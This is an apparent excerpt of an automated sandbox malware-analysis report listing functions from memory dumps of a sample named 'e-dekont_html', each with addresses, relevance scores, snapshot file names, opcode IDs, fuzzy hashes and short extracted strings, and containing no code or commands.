                                                                                                                                                          • Opcode ID: efc106942c70482f921a9b0c3aa7d35414cfca0ac01d7072680ea6186ceb86d5
                                                                                                                                                          • Instruction ID: 9d40fc9f752cab8ba69ca3f6a46d5c863aded24cdb75965e428feb99f9ab253f
                                                                                                                                                          • Opcode Fuzzy Hash: efc106942c70482f921a9b0c3aa7d35414cfca0ac01d7072680ea6186ceb86d5
                                                                                                                                                          • Instruction Fuzzy Hash: E0D1D535D2076A8ACB14EFA4D9906E9B7B1FFD5300F50979AE04977224EF706AC4CB81
                                                                                                                                                          Function 012BD57C Relevance: .3, Instructions: 264COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 606d8cdd4ae1ba2134d80bc0a52053fe5e5b093ab477300ece2609a4d8205590
                                                                                                                                                          • Instruction ID: 1c7f53728308a897a8c4c5afa3ea3917e47c5f8b2ca0437a9e32f2f25b975e73
                                                                                                                                                          • Opcode Fuzzy Hash: 606d8cdd4ae1ba2134d80bc0a52053fe5e5b093ab477300ece2609a4d8205590
                                                                                                                                                          • Instruction Fuzzy Hash: 45A17132E202168FCF05DFB4CD805EEBBB2FF85340B15856AE905AB261DB71E955CB40
                                                                                                                                                          Function 08F06678 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0a5fc1cba21999f3932bdf0a3aef1da68f098cd1d9d1a3244d90035f8ed1e2de
                                                                                                                                                          • Instruction ID: 27005afebf90ed7a56871514795e03e401dc47f6bed222168272dfe4bc09164c
                                                                                                                                                          • Opcode Fuzzy Hash: 0a5fc1cba21999f3932bdf0a3aef1da68f098cd1d9d1a3244d90035f8ed1e2de
                                                                                                                                                          • Instruction Fuzzy Hash: 38D1D535D2076A8ACB14EBA4D9906E9B7B1FFD5300F50979AE04977224EF706AC4CB81
                                                                                                                                                          Function 08F034A8 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5b34007a8969610b00f94aed0bbdd5ef258773b356dc9d475ea210c3beea38e3
                                                                                                                                                          • Instruction ID: 0cff5dc094ebb66ac6e886afab483f0fd4c542ba7689261b75ea8f921fd78926
                                                                                                                                                          • Opcode Fuzzy Hash: 5b34007a8969610b00f94aed0bbdd5ef258773b356dc9d475ea210c3beea38e3
                                                                                                                                                          • Instruction Fuzzy Hash: B04197B5E016188FEB68CF6BC94079AFAF3AFC9201F14C1A9D408AB354EB3059859F51

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 02BEC147 Relevance: 6.5, Strings: 5, Instructions: 226COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: a96f31d7a5bcef4be39c45d4f241a295a469bf1c90a74f52867f6e0218eca9ca
                                                                                                                                                          • Instruction ID: d4532a422362235e68fba069574224b46c402ff81902c85dbad74288f6743d62
                                                                                                                                                          • Opcode Fuzzy Hash: a96f31d7a5bcef4be39c45d4f241a295a469bf1c90a74f52867f6e0218eca9ca
                                                                                                                                                          • Instruction Fuzzy Hash: EFA1B575E00218DFDB14DFA9D884A9DBBB2FF89310F1480AAE409AB365DB319981CF55
                                                                                                                                                          Function 02BE5362 Relevance: 6.4, Strings: 5, Instructions: 192COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: ed9bd72674e4eaa26c26961f53dcd8b92ce928f8fa29c68dda5f63f88a12201f
                                                                                                                                                          • Instruction ID: 6c399a0a069fc647f9bdc1fa28645b2811d024cf3fc5c0f6e7030e970a42bf8c
                                                                                                                                                          • Opcode Fuzzy Hash: ed9bd72674e4eaa26c26961f53dcd8b92ce928f8fa29c68dda5f63f88a12201f
                                                                                                                                                          • Instruction Fuzzy Hash: 0791B374E00218DFDB14DFA9D994A9DBBF2BF89304F1580A9E809AB365DB309985CF50
                                                                                                                                                          Function 02BECA08 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 52d5544e1aa438a13672cb51116bf6bc6c56078a8fc526dc1a0c456dfcddc460
                                                                                                                                                          • Instruction ID: ac435fe4470be30c6e165f987b8d8c41f0ff81aa2dd5c9094533b5371d3b05ad
                                                                                                                                                          • Opcode Fuzzy Hash: 52d5544e1aa438a13672cb51116bf6bc6c56078a8fc526dc1a0c456dfcddc460
                                                                                                                                                          • Instruction Fuzzy Hash: 17819574E01218DFDB54DFA9D994A9DBBF2BF88300F1490AAE419AB365DB309981CF50
                                                                                                                                                          Function 02BECFAA Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 8207d6b3ee377afe12aa891935e60f3ea849ffe4dfb01a5adf92edca37e6d6c1
                                                                                                                                                          • Instruction ID: 53d33ffca7f0b5dcc1af5c81e72d038b9134aeefb057695d37ecd6d37081177a
                                                                                                                                                          • Opcode Fuzzy Hash: 8207d6b3ee377afe12aa891935e60f3ea849ffe4dfb01a5adf92edca37e6d6c1
                                                                                                                                                          • Instruction Fuzzy Hash: 5681A274E00218DFDF14DFAAD984A9DBBF2BF89310F1480A9E409AB365DB709981CF51
                                                                                                                                                          Function 02BECCD8 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 553e9cc42f6ea59341863b318b9b308fbd481e195755badae0277a1de717f0da
                                                                                                                                                          • Instruction ID: db80aac3f7b838c158830672a85a680772429b6873ebb9c8b5901509b069e152
                                                                                                                                                          • Opcode Fuzzy Hash: 553e9cc42f6ea59341863b318b9b308fbd481e195755badae0277a1de717f0da
                                                                                                                                                          • Instruction Fuzzy Hash: F9819374E00218DFDB14DFA9D984A9DBBF2BF89300F14D0AAE419AB355DB30A985CF51
                                                                                                                                                          Function 02BED278 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 0e1d152b8784409c87864b2e63350e2b33c65ae8df630c6e894d774b5c632799
                                                                                                                                                          • Instruction ID: 89a52101ab946d90c579fc1915b987963a2184ed9e0be45fd553e9841128d74c
                                                                                                                                                          • Opcode Fuzzy Hash: 0e1d152b8784409c87864b2e63350e2b33c65ae8df630c6e894d774b5c632799
                                                                                                                                                          • Instruction Fuzzy Hash: 6A819474E00219CFDB18DFA9D984A9DBBF2BF89300F14D0A9E419AB365DB709981CF50
                                                                                                                                                          Function 02BEC468 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: f8262f2c5d56b5ee7c58b4330535565aa9d4b4191a971c78be67e4bf124601b9
                                                                                                                                                          • Instruction ID: 8d5b45edf354c6f224aed2bd6e84dd73e84ad3153e08e45a8ee0b8b859f667b7
                                                                                                                                                          • Opcode Fuzzy Hash: f8262f2c5d56b5ee7c58b4330535565aa9d4b4191a971c78be67e4bf124601b9
                                                                                                                                                          • Instruction Fuzzy Hash: 5B8195B5E00218DFDB14DFA9D984A9EBBF2FF89310F1490AAE419AB355DB309941CF50
                                                                                                                                                          Function 02BEC738 Relevance: 6.4, Strings: 5, Instructions: 180COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: dc935311010fbaab3767859429d5cb5a6ccc20ef468599c6686f15678982934a
                                                                                                                                                          • Instruction ID: 27d87ae74820eba1b2b3796f3b53013bc7c1655f1b0cc8378041b46575b222bb
                                                                                                                                                          • Opcode Fuzzy Hash: dc935311010fbaab3767859429d5cb5a6ccc20ef468599c6686f15678982934a
                                                                                                                                                          • Instruction Fuzzy Hash: E0819474E00218DFDB54DFAAD984A9DBBF2BF88310F14D0AAE459AB355DB309981CF50
                                                                                                                                                          Function 02BE9DE0 Relevance: 6.1, Strings: 4, Instructions: 1128COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$4'fq$4'fq$4'fq
                                                                                                                                                          • API String ID: 0-1260671024
                                                                                                                                                          • Opcode ID: c87e83d65bbc2e579dc941cbf9c5fcd1cea07171084e3b7be480ae4d4289b4e4
                                                                                                                                                          • Instruction ID: 35f486a1cdce6f08632d19d3902a013e58ff5e22ec5f2d3b11242f6d52fee641
                                                                                                                                                          • Opcode Fuzzy Hash: c87e83d65bbc2e579dc941cbf9c5fcd1cea07171084e3b7be480ae4d4289b4e4
                                                                                                                                                          • Instruction Fuzzy Hash: EDA28E71A002099FCF15CF68C984AAEBBB6FF88304F1585A9E4169B365D730ED85CB91
                                                                                                                                                          Function 02BE7118 Relevance: 5.3, Strings: 4, Instructions: 349COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$(ofq$,jq$,jq
                                                                                                                                                          • API String ID: 0-1018418033
                                                                                                                                                          • Opcode ID: c6ae7dd71a6c190fac0f1f0e4ec1708b6235e68be1a20b6cbd1a2b3776321555
                                                                                                                                                          • Instruction ID: bf3e440c2d29d9e79cf6f890c0c38d988874b9f96d30c29915ed0eb4fa94f21b
                                                                                                                                                          • Opcode Fuzzy Hash: c6ae7dd71a6c190fac0f1f0e4ec1708b6235e68be1a20b6cbd1a2b3776321555
                                                                                                                                                          • Instruction Fuzzy Hash: FBE12B70A00119DFCF15CFA9D984AADFBF2FF49304F5981A5E806AB265DB30E841DB50
                                                                                                                                                          Function 02BE69A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$Hjq
                                                                                                                                                          • API String ID: 0-2051923243
                                                                                                                                                          • Opcode ID: 35f485c4d5a3aa471a04ac523a69bbe7ff93e984cd14ad4424cbba9ebd9e8f00
                                                                                                                                                          • Instruction ID: 1c9680421d83e50e765235910acb9a33dc06816a85131d63f90bfe52c79faaa5
                                                                                                                                                          • Opcode Fuzzy Hash: 35f485c4d5a3aa471a04ac523a69bbe7ff93e984cd14ad4424cbba9ebd9e8f00
                                                                                                                                                          • Instruction Fuzzy Hash: 5D126B70A002199FDB14DFA9C854BAEBBF6FF98304F2085A9E5069B395DF309D45CB90
                                                                                                                                                          Function 02BEE97A Relevance: .2, Instructions: 150COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 644e969b1883adf43f3f50d585e76b8d5080263bfc922b7094ae86a624462dc1
                                                                                                                                                          • Instruction ID: 8604d11276e117fb7e75a77a59aa6e4f80baf038dfe61648d03548f8dc0fea26
                                                                                                                                                          • Opcode Fuzzy Hash: 644e969b1883adf43f3f50d585e76b8d5080263bfc922b7094ae86a624462dc1
                                                                                                                                                          • Instruction Fuzzy Hash: E9519475E00208DFDB18DFBAD494A9DBBB2FF89310F24906AE915AB364DB305941CF14
                                                                                                                                                          Function 02BEE988 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3b8a7aad2b4ebd23c9d5e8c98ab9cd4c561642b7fc38bc0f43b9414f59a057b1
                                                                                                                                                          • Instruction ID: 29cfb718deae8b510f22a209be0b7cb08912e31ad698fff292c77859a0f75ff5
                                                                                                                                                          • Opcode Fuzzy Hash: 3b8a7aad2b4ebd23c9d5e8c98ab9cd4c561642b7fc38bc0f43b9414f59a057b1
                                                                                                                                                          • Instruction Fuzzy Hash: AA519374E00208DFDB18DFBAD584A9DBBB2FF89310F24916AE915AB364DB309941CF14
                                                                                                                                                          Function 02BE76F1 Relevance: 10.5, Strings: 8, Instructions: 474COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$(ofq$(ofq$(ofq$(ofq$(ofq$,jq$,jq
                                                                                                                                                          • API String ID: 0-3756152659
                                                                                                                                                          • Opcode ID: 170eb8476239c3a52033ce0dd0b3fd498b57f78293fe121d551e4e7795411513
                                                                                                                                                          • Instruction ID: 319401f9ccb7b2ebfbbc338e05d6056b6deea4f8fff320950f9441830c84091a
                                                                                                                                                          • Opcode Fuzzy Hash: 170eb8476239c3a52033ce0dd0b3fd498b57f78293fe121d551e4e7795411513
                                                                                                                                                          • Instruction Fuzzy Hash: 5C123830A002099FCF14DF69D994AAEBBF2FF48314F148599E41ADB2A1DB30ED41DB90
                                                                                                                                                          Function 02BE5F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hjq$Hjq
                                                                                                                                                          • API String ID: 0-2395847853
                                                                                                                                                          • Opcode ID: 1f2256973d65991783cdd12c732bf51f042e3d7ba800b719693f9fde7496de51
                                                                                                                                                          • Instruction ID: b406694420f0b07b2ffcf97d967db7918e04997f72fb2a450d5b0dc9cf7749b0
                                                                                                                                                          • Opcode Fuzzy Hash: 1f2256973d65991783cdd12c732bf51f042e3d7ba800b719693f9fde7496de51
                                                                                                                                                          • Instruction Fuzzy Hash: 7F91AD317042558FDF16AF34C894B6E7BA6FF98304F0489A9E5068B392CB349C45C792
                                                                                                                                                          Function 02BE6498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ,jq$,jq
                                                                                                                                                          • API String ID: 0-3554820393
                                                                                                                                                          • Opcode ID: 52024c5b7b5e5250d85fcba9557d8874ba8e5b2c77b1d6e20af69860e912b0a7
                                                                                                                                                          • Instruction ID: 0931e19477d12db2afab8cad2368d93b26884e298d52ba352530bb205bdb7a7b
                                                                                                                                                          • Opcode Fuzzy Hash: 52024c5b7b5e5250d85fcba9557d8874ba8e5b2c77b1d6e20af69860e912b0a7
                                                                                                                                                          • Instruction Fuzzy Hash: C8819CB0B10505CFCF14CF69C888AAABBFAFF99214B1581A9D506D73A5DB31EC41CB90
                                                                                                                                                          Function 02BE3CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xjq$Xjq
                                                                                                                                                          • API String ID: 0-958142700
                                                                                                                                                          • Opcode ID: be36d8bd15c09f4508d2f9b4fdb7f26c7714bc4db764a10d5c6a58f33bb05fe5
                                                                                                                                                          • Instruction ID: 18d9b99c4f4c49fdbebdd0c39bc4a115e0e3ab650e685834a8ca03265bca2bc1
                                                                                                                                                          • Opcode Fuzzy Hash: be36d8bd15c09f4508d2f9b4fdb7f26c7714bc4db764a10d5c6a58f33bb05fe5
                                                                                                                                                          • Instruction Fuzzy Hash: BB31D335B003298BDF284A6A989437E66E6EBC4310F1484FEE817C3380DFB5CC4596A1
                                                                                                                                                          Function 02BE8EF8 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $fq$$fq
                                                                                                                                                          • API String ID: 0-2537786760
                                                                                                                                                          • Opcode ID: 3830bf04ded6403c887b2a4643cf4caab6a01e3654706c09950c752b595aadd7
                                                                                                                                                          • Instruction ID: 947e128a7b1a5b3b98aab5fd6d87abb83b3983acd9847d535846e014db76b035
                                                                                                                                                          • Opcode Fuzzy Hash: 3830bf04ded6403c887b2a4643cf4caab6a01e3654706c09950c752b595aadd7
                                                                                                                                                          • Instruction Fuzzy Hash: 333161703049518FCF259B69D89463E7B67FB85610B155DEAE013CB2A2DB24DC40C7D6
                                                                                                                                                          Function 02BE9D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 4'fq$4'fq
                                                                                                                                                          • API String ID: 0-751858264
                                                                                                                                                          • Opcode ID: d6d9b2783ef13cbbf3c041b83b58b343802b4213279ebde5ee040fa336bc0335
                                                                                                                                                          • Instruction ID: 50902acc11e509fc82f1c2c1c8b0e514d43d9d6bd6e941b0ae2293db97d69703
                                                                                                                                                          • Opcode Fuzzy Hash: d6d9b2783ef13cbbf3c041b83b58b343802b4213279ebde5ee040fa336bc0335
                                                                                                                                                          • Instruction Fuzzy Hash: EEF0A4753001142FDF081AA5985497FBA9BEBC8360B048569BA0AC7390DF71CC0597A1
                                                                                                                                                          Function 02BE0C8F Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LRfq
                                                                                                                                                          • API String ID: 0-2333822924
                                                                                                                                                          • Opcode ID: 6f75889ce4e39537fc5617b4cf50fce76a0bc8c27f1d44231e119d15accab45d
                                                                                                                                                          • Instruction ID: 5172ce536596e1b6b9dafd990610b857cde1a9b93fc26cc5113b869a7761b764
                                                                                                                                                          • Opcode Fuzzy Hash: 6f75889ce4e39537fc5617b4cf50fce76a0bc8c27f1d44231e119d15accab45d
                                                                                                                                                          • Instruction Fuzzy Hash: E852BD79D01219DFCB54EF64E998B9DBBB2FB48301F104A9AD409A7358DB306E85CF90
                                                                                                                                                          Function 02BE0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LRfq
                                                                                                                                                          • API String ID: 0-2333822924
                                                                                                                                                          • Opcode ID: f9430967b2fd3571dc6dca50dadea622264afce1325475d2cedd7674a4378265
                                                                                                                                                          • Instruction ID: aab25c5e50d0c4426b3c930f85739363ecfe228c65d7d4f946a1fb601031ca6a
                                                                                                                                                          • Opcode Fuzzy Hash: f9430967b2fd3571dc6dca50dadea622264afce1325475d2cedd7674a4378265
                                                                                                                                                          • Instruction Fuzzy Hash: 3352AD79D01219DFCB54EF64E994B9DBBB2FB48301F104A9AD409A7358DB306E85CF90
                                                                                                                                                          Function 02BEAEBA Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq
                                                                                                                                                          • API String ID: 0-334256475
                                                                                                                                                          • Opcode ID: dc41e99dbf9b8de63723313daa0e4251a548f7b1d2085e156317b5e44d99b6d8
                                                                                                                                                          • Instruction ID: c079dd6c5bc8fd9bffe7035595a99a0bb95f4b359c3d5738bda8fae1892e929a
